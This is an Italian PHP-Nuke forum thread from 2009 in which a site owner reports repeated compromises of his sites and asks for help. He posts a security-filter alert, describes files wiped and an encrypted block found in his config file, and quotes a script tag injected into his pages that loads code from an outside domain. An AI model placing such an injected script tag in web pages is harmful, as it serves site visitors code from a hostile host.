TSmenu

Attualmente in www.tuttosoft.it è stata caricata la versione del nuke 7.9 TS sono presenti la bellezza di 78 categorie e 713 downloads       Utenti registrati:  13486    Admin del sito sono: 1  Ultimi 5 Utenti registrati :    208ferro    Pascuzzu    joigue    Nat4n    fausto93

Fai Una Donazione

Siti Amici

©

Pubblicità

Ts Tags Ver 1.0
Configurare la scheda di rete da terminale con Ubuntu Banners OpenId 0.3 new Blocchi LGNuke 2.0.0RC Ts Gallery Php Nuke Installare Cairo-Dock su Ubuntu Linux a 64bit Alexthemaster Generatore Numeri casuale Virit Antivirus PageRank Moduli PageRank 5 JQooBe Gnu License Ranks Forum Slaybook 1.2.1 Mappa sito Indicizzazione del tuo sito vea83inc Directory Tuttosoft Notepad ++ Avatars Nuke Ts Menu 5.3 Weblord Banner Proxy su Linux Ubuntu Temi PhpBB Ts Contacts Nuke Sentinel 2.6.01 Numbers 1.0 Serpe76 Fonts Pilia Federico Forums Php Nuke PR5 Donazione Sitemap Sottoscriviti Ubuntu 9.10 Giovannib Più comandi in uno unico con Linux da terminale IP Remote Changer Forum phbb3 V 3.0.4 Staff del sito Karmik koala No Spam Attack 3.1 Misura il PageRank Mascherare Mac-Address con Linux Splatt Chat 0.8.29 Installare Lamp su Ubuntu Linux Trucchi Nuke Matteoiamma Cambiare Ip da remoto Temi Phpnuke Oracle su Linux Queen_live78 Nukelive 1.0 Addons

Tuttosoft.it Php Nuke Italian Community: Forums

TUTTOSOFT :: Leggi il Topic - attaco al sito? Benvenuti nel Forum di tuttosoft.it , per qualsiasi problema postate pure nel forum vi verrà data una risposta entro le 24 ore dal momento del Post. Buona Navigazione
 FAQFAQ   CercaCerca   Gruppi utentiGruppi utenti   ProfiloProfilo   Messaggi PrivatiMessaggi Privati   LoginLogin 

attaco al sito?

 
Nuovo Topic   Rispondi    Indice del forum -> Sicurezza
Precedente :: Successivo  
Autore Messaggio
nonsoloprogrammi
Maestro
Maestro


Registrato: Jan 17, 2009
Messaggi: 332
Località: guardia sanframondi

MessaggioInviato: Sab Ott 17, 2009 10:49 am    Oggetto: attaco al sito? Rispondi citando

ciao a tutti raga mi sa che questa volta mi anno attacato il sito ho ricevuto la seguente email:
Codice:

Data & Ora: 2009-10-17 03:00:10 CEST GMT +0200
IP Bloccato: 85.238.110.14
User ID: Anonimo (1)
Ragione: Abuse-Filter
--------------------
Browser Utente: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)
Stringa Query: www.nonsoloprogrammi.it/modules.php?name=Your_Account&op=new_user+[PLM=0][R]+GET+http://www.nonsoloprogrammi.it/modules.php?name=Your_Account&op=new_user+[0,25002,27019]+->+[R]+POST+http://www.nonsoloprogrammi.it/modules.php?name=Your_Account+[0,0,25232]+->+[L]+GET+http://www.nonsoloprogrammi.it/modules.php?name=Your_Account+[0,25537,26411]+->+[L]+POST+http://www.nonsoloprogrammi.it/modules.php?name=Your_Account+[0,0,25867]
Stringa Get: www.nonsoloprogrammi.it/modules.php
Stringa POST: www.nonsoloprogrammi.it/modules.php?name=Your_Account&op=new_user [0,25002,27019] -> [R] POST http://www.nonsoloprogrammi.it/modules.php?name=Your_Account [0,0,25232] -> [L] GET http://www.nonsoloprogrammi.it/modules.php?name=Your_Account [0,25537,26411] -> [L] POST http://www.nonsoloprogrammi.it/modules.php?name=Your_Account [0,0,25867]
Inoltrato Per: none
Client IP: none
Indirizzo remoto: 85.238.110.14
Porta Remota: 3386
Metodo Richiesta: GET
--------------------

e ora mi esce il sito tutto bianco cosa sia successo? ho nukesentinel la vecchia versione forse e successo qualcosa li? aiutatemi..
_________________
i miei siti http://www.nonsoloprogrammi.it http://www.mondophpnuke.com e http://www.chatgiovani.com
Torna in cima
Profilo Messaggio privato HomePage MSN Messenger
nonsoloprogrammi
Maestro
Maestro


Registrato: Jan 17, 2009
Messaggi: 332
Località: guardia sanframondi

MessaggioInviato: Sab Ott 17, 2009 12:17 pm    Oggetto: Rispondi citando

Raga sono riuscito a ripristinare tutto per fortuna avevo un backup del sito praticamente sapete che anno fatto hanno scaricato il sito aperto tutti i file e cancellato il contenuto e ricaricato tutto...
_________________
i miei siti http://www.nonsoloprogrammi.it http://www.mondophpnuke.com e http://www.chatgiovani.com
Torna in cima
Profilo Messaggio privato HomePage MSN Messenger
nonsoloprogrammi
Maestro
Maestro


Registrato: Jan 17, 2009
Messaggi: 332
Località: guardia sanframondi

MessaggioInviato: Sab Ott 17, 2009 8:10 pm    Oggetto: Rispondi citando

raga ho trovato nel mio altro sito anche lui attacato con lo stesso problema il seguente codice che era postato nel file config io non c'e avvevo meso poi e criptato e come aprivo il mio sito mi si attacava antivirus perche diceva che era stato trovato un malwin ecco il codice chi me lo riescie a decriptiare?il codice lo metto in allegato perche non vorrei che poi risultase questa pagina infettata www.nonsoloprogrammi.com/codice.txt
riuscite a capire di che si tratta??
_________________
i miei siti http://www.nonsoloprogrammi.it http://www.mondophpnuke.com e http://www.chatgiovani.com
Torna in cima
Profilo Messaggio privato HomePage MSN Messenger
nonsoloprogrammi
Maestro
Maestro


Registrato: Jan 17, 2009
Messaggi: 332
Località: guardia sanframondi

MessaggioInviato: Dom Ott 18, 2009 7:31 am    Oggetto: Rispondi citando

di nuovo un altro attacoi stamatina ora ho visto nel html del broweser escie questo <script src=http://hamnkrog.se/xmlrpc/LICENSE.php ></script>
chi mi aiuta???
_________________
i miei siti http://www.nonsoloprogrammi.it http://www.mondophpnuke.com e http://www.chatgiovani.com
Torna in cima
Profilo Messaggio privato HomePage MSN Messenger
Mostra prima i messaggi di:   
Nuovo Topic   Rispondi    Indice del forum -> Sicurezza Tutti i fusi orari sono GMT + 1 ora
Pagina 1 di 1

 
Vai a:  
Non puoi inserire nuovi Topic in questo forum
Non puoi rispondere ai Topic in questo forum
Non puoi modificare i tuoi messaggi in questo forum
Non puoi cancellare i tuoi messaggi in questo forum
Non puoi votare nei sondaggi in questo forum

Powered by phpBB © 2001, 2005 phpBB Group
Tema Creato da Queen_live78 © 2007